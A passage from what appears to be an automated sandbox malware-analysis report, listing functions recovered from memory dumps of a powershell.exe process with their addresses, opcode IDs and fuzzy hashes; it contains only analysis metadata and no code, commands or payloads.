                            • Instruction Fuzzy Hash: B7F0E9397057406FD3019B36E8409D6BBAAEF87311F0540B6E108CF361CA25AC05CB71
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 033B3447, Relevance: .0, Instructions: 36COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.930287112.00000000033B0000.00000040.00000001.sdmp, Offset: 033B0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2fbdc24c09a0ed342cb03c4dd0817d1c54ffd523d9de9ecb85425a3d77c39679
                            • Instruction ID: 275969d6e425d2bf1f7c3957257502a1f7d1708e76c7810da2a61b986283a05e
                            • Opcode Fuzzy Hash: 2fbdc24c09a0ed342cb03c4dd0817d1c54ffd523d9de9ecb85425a3d77c39679
                            • Instruction Fuzzy Hash: 85F096362046449FDB02CF65DC409DA7FE6EFDB320F1981A6E9548B366C6308D12DB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 078C8348, Relevance: .0, Instructions: 34COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.964058890.00000000078C0000.00000040.00000001.sdmp, Offset: 078C0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: baaae443e7fb59c31b8db461d0ada1f9861cd4f70d01728725ccc58cba12fc0d
                            • Instruction ID: 50bef68ececa83db13eaf57e7e0475f377e33022d0201687b6ec6212960f7ba6
                            • Opcode Fuzzy Hash: baaae443e7fb59c31b8db461d0ada1f9861cd4f70d01728725ccc58cba12fc0d
                            • Instruction Fuzzy Hash: F3E0D8373052542F87159A36AC045DB7FAAEBD51B1318857BEA48C72A2DA35CD0682A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 033B7ED8, Relevance: .0, Instructions: 33COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.930287112.00000000033B0000.00000040.00000001.sdmp, Offset: 033B0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9c08ac7e5d311f85b0169b1ab45a795c660cfdf2f527377d0232075e993da15d
                            • Instruction ID: e898f6f41aeeaa3d4f2f7e1438aa50fc9434e112c7396ad323bd35a70486edd4
                            • Opcode Fuzzy Hash: 9c08ac7e5d311f85b0169b1ab45a795c660cfdf2f527377d0232075e993da15d
                            • Instruction Fuzzy Hash: 39F0BE342093408FC7298B36E884852BBBBFFC9621358856DE55A87611CA36E852CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 033B4620, Relevance: .0, Instructions: 32COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.930287112.00000000033B0000.00000040.00000001.sdmp, Offset: 033B0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a4886f38aa8046acfc33d9e0a977d6b1f1797f9cb4f00022b924fe821abaf975
                            • Instruction ID: f591a8cb4cbc9f9d5552a755f276a0049de4817987a35062c07a0c7ca788dd38
                            • Opcode Fuzzy Hash: a4886f38aa8046acfc33d9e0a977d6b1f1797f9cb4f00022b924fe821abaf975
                            • Instruction Fuzzy Hash: 78F0A07220A2406FD306829A9C00EB63BBDDBC6761F1A80AAE144CB692E9A58C018364
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 033B39E8, Relevance: .0, Instructions: 24COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.930287112.00000000033B0000.00000040.00000001.sdmp, Offset: 033B0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2bfde9f3a05f0d38444daebed945896581f10c2d5d1e6abab8f5ac634dd629ed
                            • Instruction ID: ab64f894448d5b325353d3a9789af1df6b3774fafefd419c0b578fc84930f4dd
                            • Opcode Fuzzy Hash: 2bfde9f3a05f0d38444daebed945896581f10c2d5d1e6abab8f5ac634dd629ed
                            • Instruction Fuzzy Hash: 15F09275D10219AFCF44DFA9D8449AEBBF5FF4C250B108429E919E3311E7349910CF90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 033B127C, Relevance: .0, Instructions: 23COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.930287112.00000000033B0000.00000040.00000001.sdmp, Offset: 033B0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5fede8e4c4f6ec6ce04cf47d4235be48910830d9c6853a1949e72f03ec680ac6
                            • Instruction ID: 6acab9af6acc17e39bdf090f255a153e21f66de93eefb35082837279cce28475
                            • Opcode Fuzzy Hash: 5fede8e4c4f6ec6ce04cf47d4235be48910830d9c6853a1949e72f03ec680ac6
                            • Instruction Fuzzy Hash: 6DF0C935E10119CFDB04DFE0D998AADB7B5FF88315F104165D6059BA94C778A945CB80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 033B4630, Relevance: .0, Instructions: 22COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.930287112.00000000033B0000.00000040.00000001.sdmp, Offset: 033B0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 77b7eaeac5465c49a8ef3fd9ae1299a4675a72d5ea2c11e2eee80288732c754c
                            • Instruction ID: d8ae2212449e9274745feab286f03389bbf1a00bcc1236c550fe585b737906dc
                            • Opcode Fuzzy Hash: 77b7eaeac5465c49a8ef3fd9ae1299a4675a72d5ea2c11e2eee80288732c754c
                            • Instruction Fuzzy Hash: 1AD05E723016107BE314558AAC05FBB76AEDBCAB72F59C07EF209DB2859DA58C1143F0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 033A4644, Relevance: .0, Instructions: 20COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.930043838.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3b67d41da31b2483d4b228ab58ec61a4140ac8dc9b10044265767244528e5536
                            • Instruction ID: 601d6b22ba5b76edfa27685ee3b3b738deba12880ae5f685026e832fadbf7e04
                            • Opcode Fuzzy Hash: 3b67d41da31b2483d4b228ab58ec61a4140ac8dc9b10044265767244528e5536
                            • Instruction Fuzzy Hash: 24E01A74A00106CFCB14DF99C999AADBFB2EF88305F248069D41297351CB75AD42CF91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 050EFEF8, Relevance: .0, Instructions: 18COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.937805072.00000000050E0000.00000040.00000001.sdmp, Offset: 050E0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0f4f37456d036f7c59219bc81bcd82412f8589d0a52ad48b346f8d9307d8eb81
                            • Instruction ID: 4aa0ba3581d1dbc841151a9c56671794d52a48cb310103bbda1b96de6de18380
                            • Opcode Fuzzy Hash: 0f4f37456d036f7c59219bc81bcd82412f8589d0a52ad48b346f8d9307d8eb81
                            • Instruction Fuzzy Hash: BAE09A78A0420ACFDB14DF54D599BAEBBF1EF48314F244559E4029B391C774D842CF50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 033B16C1, Relevance: .0, Instructions: 17COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.930287112.00000000033B0000.00000040.00000001.sdmp, Offset: 033B0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a546fda362c14000b1e3da7cfb0b06f285ef752675bf2f9dc976410ead7f99cc
                            • Instruction ID: 00c7fda323cffaa1fdc112f7d059ab9762b5b0fd73a44716d22f436103d24e3a
                            • Opcode Fuzzy Hash: a546fda362c14000b1e3da7cfb0b06f285ef752675bf2f9dc976410ead7f99cc
                            • Instruction Fuzzy Hash: 86D0C9761493445FC711CB78A8148C1BFE56E1B62432791D3E008CF633D521AC459662
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 033B0F6E, Relevance: .0, Instructions: 14COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.930287112.00000000033B0000.00000040.00000001.sdmp, Offset: 033B0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6818941f8ce87d06f3426c06b0377c9ca705664782424a9b84cbc9aa7345f214
                            • Instruction ID: 9c4d026f0738b592d432d3151d1cf07cfc3a02da05affc9209489f443fc2d723
                            • Opcode Fuzzy Hash: 6818941f8ce87d06f3426c06b0377c9ca705664782424a9b84cbc9aa7345f214
                            • Instruction Fuzzy Hash: 27D0C936B00105CFDB04CFA4E884AEDF7B4FF44229F2141A6D655DB621D331EA14CB80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 033A463B, Relevance: .0, Instructions: 13COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.930043838.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a4c3e9dce25a9dae2e59651832e58c5f864dcc60a4bd5825d72663c7fea0e7f6
                            • Instruction ID: 40de087ec667c0a43d15fc62f76efc31dc4451b7f5bcfc818def60570d3ddd2c
                            • Opcode Fuzzy Hash: a4c3e9dce25a9dae2e59651832e58c5f864dcc60a4bd5825d72663c7fea0e7f6
                            • Instruction Fuzzy Hash: 25E0177080024ACFDB00CF89C49A7ADBFB0FF44305F200419D012A6651CBB51A80CF80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 033B4A4A, Relevance: .0, Instructions: 13COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.930287112.00000000033B0000.00000040.00000001.sdmp, Offset: 033B0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4ed978dae006a132c259518be520fe9069b73a8fd65cc3401a889b6ccdee6776
                            • Instruction ID: c88cb713032026e9be00dd6d02371f5e4a657e578ad307f751b3c18a93250a45
                            • Opcode Fuzzy Hash: 4ed978dae006a132c259518be520fe9069b73a8fd65cc3401a889b6ccdee6776
                            • Instruction Fuzzy Hash: 59D09E35A00018CBCF04DF88D8557DCF7B0FB88319F148059D918B7241C7766956CB54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 078C90A8, Relevance: .0, Instructions: 10COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.964058890.00000000078C0000.00000040.00000001.sdmp, Offset: 078C0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 64ab2314127faca50447d8ebe39a6877823b2ee2a4813c8949df5c48821f8372
                            • Instruction ID: e2f70be8f51e9b6b91ccb8e2acad554a6bef575b0f36a2b7312ff5f2a0ac583b
                            • Opcode Fuzzy Hash: 64ab2314127faca50447d8ebe39a6877823b2ee2a4813c8949df5c48821f8372
                            • Instruction Fuzzy Hash: 98C08C3AF010098FCB00CB94F8848DCF771FBC8225B00C022E10583141C731A022DB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 078CBBE0, Relevance: .0, Instructions: 10COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.964058890.00000000078C0000.00000040.00000001.sdmp, Offset: 078C0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0e6e282098355ffd054b0551815c6efb085f4df1fd1adb5660d852d8d658ca24
                            • Instruction ID: 6e3eb5d38c3aeea00e884d3ad31d7d094bb556ed5ec5fdcc90727fef95c24d73
                            • Opcode Fuzzy Hash: 0e6e282098355ffd054b0551815c6efb085f4df1fd1adb5660d852d8d658ca24
                            • Instruction Fuzzy Hash: 2CC04C6054E3C54FEB038779858A7543F30DF62615F4920C6D4D5CF053D6185417D71A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 033B16D0, Relevance: .0, Instructions: 7COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000C.00000002.930287112.00000000033B0000.00000040.00000001.sdmp, Offset: 033B0000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fa3235a201bb0fe260959cb9b1d708e6692c76d25554da47b9c6629e3bad1601
                            • Instruction ID: 96a74fec5220f98754945e00ce640a92889f3d2d232068f8612b65c1e83e2114
                            • Opcode Fuzzy Hash: fa3235a201bb0fe260959cb9b1d708e6692c76d25554da47b9c6629e3bad1601
                            • Instruction Fuzzy Hash: B4B092351502088F82009B68E448C4073E8AB08A253114090E10C8B232C621FC008A40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Analysis Process: powershell.exe PID: 6376 Parent PID: 6360 powershell.exeCOMMON

                            Executed Functions

                            Function 0796D5B0, Relevance: .6, Instructions: 559COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000E.00000002.976017692.0000000007960000.00000040.00000001.sdmp, Offset: 07960000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7a891e2a7153ef906f2f578e31ada3367c7d8c353e378e168682e45c88bcec52
                            • Instruction ID: 43d6c07bab9c5156756ad64020504fb7f928bc16ba64f54d28c15069246c3f4f
                            • Opcode Fuzzy Hash: 7a891e2a7153ef906f2f578e31ada3367c7d8c353e378e168682e45c88bcec52
                            • Instruction Fuzzy Hash: 39326B74B00209DFDF04DFA4D898AAEBBB6FF88304F148569E516AB354DB75AC41CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 07453788, Relevance: 2.1, Strings: 1, Instructions: 871COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.975301482.0000000007450000.00000040.00000001.sdmp, Offset: 07450000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID: %K!#
                            • API String ID: 0-3258483109
                            • Opcode ID: 94544fdbbc8c98d31ba5a71edac5c57bf36ea8e628fbfaa5b6f273e5ba0b6e36
                            • Instruction ID: bcdc98998fd21a0952cdd37e56cbdd710924740a0cc91f36db243c1c97f7ed5e
                            • Opcode Fuzzy Hash: 94544fdbbc8c98d31ba5a71edac5c57bf36ea8e628fbfaa5b6f273e5ba0b6e36
                            • Instruction Fuzzy Hash: 425237F57042429FDB119F6984106EBB7E29FC6658F1884ABD946CF382DB31DC42C7A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 07451C30, Relevance: 1.8, Strings: 1, Instructions: 582COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.975301482.0000000007450000.00000040.00000001.sdmp, Offset: 07450000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID: %K!#
                            • API String ID: 0-3258483109
                            • Opcode ID: f9229b2cab0a8da199d14f641b37945169a59b370b31feaf6967f0b719ca7980
                            • Instruction ID: 5e70aa65bbd929ba7c4633c3c9977422d2359a90bde20c71b3f564cb64cdb7f7
                            • Opcode Fuzzy Hash: f9229b2cab0a8da199d14f641b37945169a59b370b31feaf6967f0b719ca7980
                            • Instruction Fuzzy Hash: 171229F57042069FDB219B7498107EBB7E2EFC5614F18846BDA068F392DB71D842C7A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 07451870, Relevance: 1.6, Strings: 1, Instructions: 314COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.975301482.0000000007450000.00000040.00000001.sdmp, Offset: 07450000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID: ;f
                            • API String ID: 0-4151727796
                            • Opcode ID: 5bee4327615051ca2372c2f397585f7a85b7f1880c86e8344169e013f835c46b
                            • Instruction ID: 59909ed28b39a9fd61dd13368d4cc356de601d57f71c213b68f73055cd3921be
                            • Opcode Fuzzy Hash: 5bee4327615051ca2372c2f397585f7a85b7f1880c86e8344169e013f835c46b
                            • Instruction Fuzzy Hash: 56A145B170424A9FD7229A6884107EBBBE6AFC6614F18846BD905CB353DB31DC45C3A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 07968986, Relevance: 1.4, Strings: 1, Instructions: 168COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.976017692.0000000007960000.00000040.00000001.sdmp, Offset: 07960000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID: I
                            • API String ID: 0-3707901625
                            • Opcode ID: 53b7061ff333fe80855ef2ef85882839897df8f361977b5b6c4f47a700d2af1f
                            • Instruction ID: d80f021d40f3e582d6d36562295a71f3c281c5f2800a8a5211ac38525fed3535
                            • Opcode Fuzzy Hash: 53b7061ff333fe80855ef2ef85882839897df8f361977b5b6c4f47a700d2af1f
                            • Instruction Fuzzy Hash: 96613FB4A00319DFDB14DBA4D958AAD7BB6FF84308F148528D806AB395DB71EC45CB81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 074386F0, Relevance: 1.4, Strings: 1, Instructions: 149COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.975120740.0000000007430000.00000040.00000001.sdmp, Offset: 07430000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID: pi f
                            • API String ID: 0-1009283040
                            • Opcode ID: 4d945dbc00b782c82a1a73c38bbcdd77c4d7a5556c52da55acbb6cf36cebec3a
                            • Instruction ID: 7184636aa7c8c04c49c117bd9a4808afa7cd3c8075c961787eafcf5dbe90b6db
                            • Opcode Fuzzy Hash: 4d945dbc00b782c82a1a73c38bbcdd77c4d7a5556c52da55acbb6cf36cebec3a
                            • Instruction Fuzzy Hash: B8514EB4A012059FDB18DF64D894BEEBBF6BF88304F14456AE406AB391DB74EC45CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 07438700, Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.975120740.0000000007430000.00000040.00000001.sdmp, Offset: 07430000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID: pi f
                            • API String ID: 0-1009283040
                            • Opcode ID: 1dfcf4880e5e1ac96c6e2cc163437b22b9c445993305ba422598db3993002d38
                            • Instruction ID: 8e4a911896ed061eef92f8f861231d0a5938f12a7433578eb7ba77d66c3f9c2f
                            • Opcode Fuzzy Hash: 1dfcf4880e5e1ac96c6e2cc163437b22b9c445993305ba422598db3993002d38
                            • Instruction Fuzzy Hash: 7B513FB4A012099FDB18DF64D894BEEBBF6BF88305F144469E406AB391DB74EC45CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 07451C27, Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.975301482.0000000007450000.00000040.00000001.sdmp, Offset: 07450000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID: %K!#
                            • API String ID: 0-3258483109
                            • Opcode ID: 59fd4712fe7fc1ad6d54fdf8d4941a7b2eba6ddc4d627757f941430ad1ce4eb6
                            • Instruction ID: a38fed533dc9a195ef2a5d0c1c3b79ab94bb502e47ce483e49fd0ce1ad8745d3
                            • Opcode Fuzzy Hash: 59fd4712fe7fc1ad6d54fdf8d4941a7b2eba6ddc4d627757f941430ad1ce4eb6
                            • Instruction Fuzzy Hash: A341E2F8B0020ACBDB619A649940BEB77E2EF84311F14845BDD168F342D732E841CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 079661B8, Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.976017692.0000000007960000.00000040.00000001.sdmp, Offset: 07960000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID: 8^ f
                            • API String ID: 0-1135406119
                            • Opcode ID: 5bc1f3dd567717c7c7ce823e6deb0aaa388db2fddadd5c8bb0493092edf1b0ad
                            • Instruction ID: a96307f074c6e21b4faeda2d7679fef6bc7bc433e7b5acaf1dab1a08a9bd85c5
                            • Opcode Fuzzy Hash: 5bc1f3dd567717c7c7ce823e6deb0aaa388db2fddadd5c8bb0493092edf1b0ad
                            • Instruction Fuzzy Hash: 9911D6727092584FCB15E7B96D102AEBFE98BC5116F1801B7E508C7282EE758E0583A3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 07966200, Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000E.00000002.976017692.0000000007960000.00000040.00000001.sdmp, Offset: 07960000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID: 8^ f
                            • API String ID: 0-1135406119
                            • Opcode ID: 80608deb9893f01b268b9fdf0948e56dc6b2a051cbc1e4b24e0b1f124f1923ef
                            • Instruction ID: 008d9554e5d5b1b92abee3d76ca7a540046fdb384d7569e3df5cc6d43962f1ca
                            • Opcode Fuzzy Hash: 80608deb9893f01b268b9fdf0948e56dc6b2a051cbc1e4b24e0b1f124f1923ef
                            • Instruction Fuzzy Hash: AFE0203370936047C311516A28143DB5BC74BC2111B0C047BE149D7352DF554D054397
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 07452368, Relevance: .8, Instructions: 762COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000E.00000002.975301482.0000000007450000.00000040.00000001.sdmp, Offset: 07450000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c3152759fc21eef88285dca60d13ad04e3a1ba5ad4713cfcc2390ec2552577ab
                            • Instruction ID: a2b102c026c46f73f55bf722196edb420b3a94f9344ceb21c9cce7a53c786f65
                            • Opcode Fuzzy Hash: c3152759fc21eef88285dca60d13ad04e3a1ba5ad4713cfcc2390ec2552577ab
                            • Instruction Fuzzy Hash: 8E4238F1B042429FD7259B6884506EBB7E6FFCA224F18846BD905CB352DB71CC42C7A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 079678C8, Relevance: .4, Instructions: 444COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000E.00000002.976017692.0000000007960000.00000040.00000001.sdmp, Offset: 07960000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e5ad1ca2c3e3f4b0195ea19eb8c7a5ab6ab2441c64330afdf0f7712e20d0fb41
                            • Instruction ID: 61b678329b4a0790038a0403b3ad81b4daba9fa69dc143e73ca172453dcd0cf7
                            • Opcode Fuzzy Hash: e5ad1ca2c3e3f4b0195ea19eb8c7a5ab6ab2441c64330afdf0f7712e20d0fb41
                            • Instruction Fuzzy Hash: 38F1E2B0B002059FDB158FB5D858AAEBBF6EF88318F148969E505DB390DB78DC41CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0796B339, Relevance: .4, Instructions: 408COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000E.00000002.976017692.0000000007960000.00000040.00000001.sdmp, Offset: 07960000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3c11f5c43f186e47ee6ffaf4d481b5e6e0dba36c02952cc9451078e8b77a9148
                            • Instruction ID: 5d538d9f8e724df0d41c6d8f94b38d90cf96e73d8a7d5a89580bc65c59d99e27
                            • Opcode Fuzzy Hash: 3c11f5c43f186e47ee6ffaf4d481b5e6e0dba36c02952cc9451078e8b77a9148
                            • Instruction Fuzzy Hash: 9502F9B4A00209CFCB14EFA4D498AADB7B6FF88305F248569D50AEB361EB749C41CF50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 07966C40, Relevance: .4, Instructions: 396COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000E.00000002.976017692.0000000007960000.00000040.00000001.sdmp, Offset: 07960000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 21ff30178743ad94f7d3ce732acd4f7243fdd7bdadc1c13ac93a7af91ec56241
                            • Instruction ID: 30ee699e153991fdaf7fabf90fbdd44257211c65bd4604d50bc09c0ceed9b029
                            • Opcode Fuzzy Hash: 21ff30178743ad94f7d3ce732acd4f7243fdd7bdadc1c13ac93a7af91ec56241
                            • Instruction Fuzzy Hash: 36E1B1B4B102059FDB04DFA4D858BAEBBF6AF89318F148269E901DB391DB75DC41CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 079672F8, Relevance: .4, Instructions: 356COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000E.00000002.976017692.0000000007960000.00000040.00000001.sdmp, Offset: 07960000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5abb7bdcfed07aeb08fabfc2a273c07cb231740994bb5903f128c8d51ced3af1
                            • Instruction ID: 5878a269273b171be8d18118bba68ff16f0ad7f9fd656827c851f948e24346b7
                            • Opcode Fuzzy Hash: 5abb7bdcfed07aeb08fabfc2a273c07cb231740994bb5903f128c8d51ced3af1
                            • Instruction Fuzzy Hash: A6D1A170B102058FDB05DFB4D8586AEBBF6EF88258F14856AD901EB391EB35DC41CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 07963AD1, Relevance: .3, Instructions: 317COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000E.00000002.976017692.0000000007960000.00000040.00000001.sdmp, Offset: 07960000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5b92547daca41b72600e0a2a6238c27dce142080dbf74b7164b3e3229539a88f
                            • Instruction ID: c13b4e79ac7f16875a207538a558c32c04b2f1ef2cc8a6f5cc2c79aaa414f225
                            • Opcode Fuzzy Hash: 5b92547daca41b72600e0a2a6238c27dce142080dbf74b7164b3e3229539a88f
                            • Instruction Fuzzy Hash: 11B18534740300AFE725EB60C895FAE37A6EF88701F10455CF506AB3D0CAB6AC818BA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 07963AE0, Relevance: .3, Instructions: 307COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000E.00000002.976017692.0000000007960000.00000040.00000001.sdmp, Offset: 07960000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8156e9aa3bf5db03211aa2fb55735ffbb2455311d26c890d013623f690ff5d87
                            • Instruction ID: 966c6006a62be8e501d8bcd726208ff1c3542274bdac1caa974ba4d8fb0f5249
                            • Opcode Fuzzy Hash: 8156e9aa3bf5db03211aa2fb55735ffbb2455311d26c890d013623f690ff5d87
                            • Instruction Fuzzy Hash: ABB16334740300AFE725EB60C895FAE77A6EF89701F10455CE506AB3D0CAB6AD81CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 07966288, Relevance: .2, Instructions: 239COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000E.00000002.976017692.0000000007960000.00000040.00000001.sdmp, Offset: 07960000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f6af309852b4333720e69030ebfa0a73cc55361489ef750faf68be3f854eeb6e
                            • Instruction ID: 00befc3e9f1421d930b5acaf1d762066a696302d368339b8aaf9f854b3634d2e
                            • Opcode Fuzzy Hash: f6af309852b4333720e69030ebfa0a73cc55361489ef750faf68be3f854eeb6e
                            • Instruction Fuzzy Hash: 99918B74B002158FDB05DF69D898AAEBBF6EF88314F048069E9069B395DF34DD41CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 07969702, Relevance: .2, Instructions: 232COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000E.00000002.976017692.0000000007960000.00000040.00000001.sdmp, Offset: 07960000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0b458f50f9ce3a6c92ab63afa941d74c6909ab3c09b19b59a4ac75a7a7dcfa9a
                            • Instruction ID: ed89d35726e72da44f0562b03de2ab398966135ada68e4ffc082ea95b28b5269
                            • Opcode Fuzzy Hash: 0b458f50f9ce3a6c92ab63afa941d74c6909ab3c09b19b59a4ac75a7a7dcfa9a
                            • Instruction Fuzzy Hash: FBA13574A04209DFDB25DFA4C488BADBBB6FF48318F51816DE405AB391DB35A981CF81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 07968458, Relevance: .2, Instructions: 208COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000E.00000002.976017692.0000000007960000.00000040.00000001.sdmp, Offset: 07960000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1734e2ff554d8c2df7b0ca511edef05fb33d724c35a56a13e9cbb422506bebc0
                            • Instruction ID: 006d1a3e88807c20cfd188ef114e6c8fdb9ef87ce1ca5c6ee5dc92b1e584bc9a
                            • Opcode Fuzzy Hash: 1734e2ff554d8c2df7b0ca511edef05fb33d724c35a56a13e9cbb422506bebc0
                            • Instruction Fuzzy Hash: 1D7107B2E00649CFDF15CFA4C804ADDBBB6EF89318F14865AD505BB280EB719D46CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 07965800, Relevance: .2, Instructions: 182COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000000E.00000002.976017692.0000000007960000.00000040.00000001.sdmp, Offset: 07960000, based on PE: false
                            Similarity
                            • API ID:
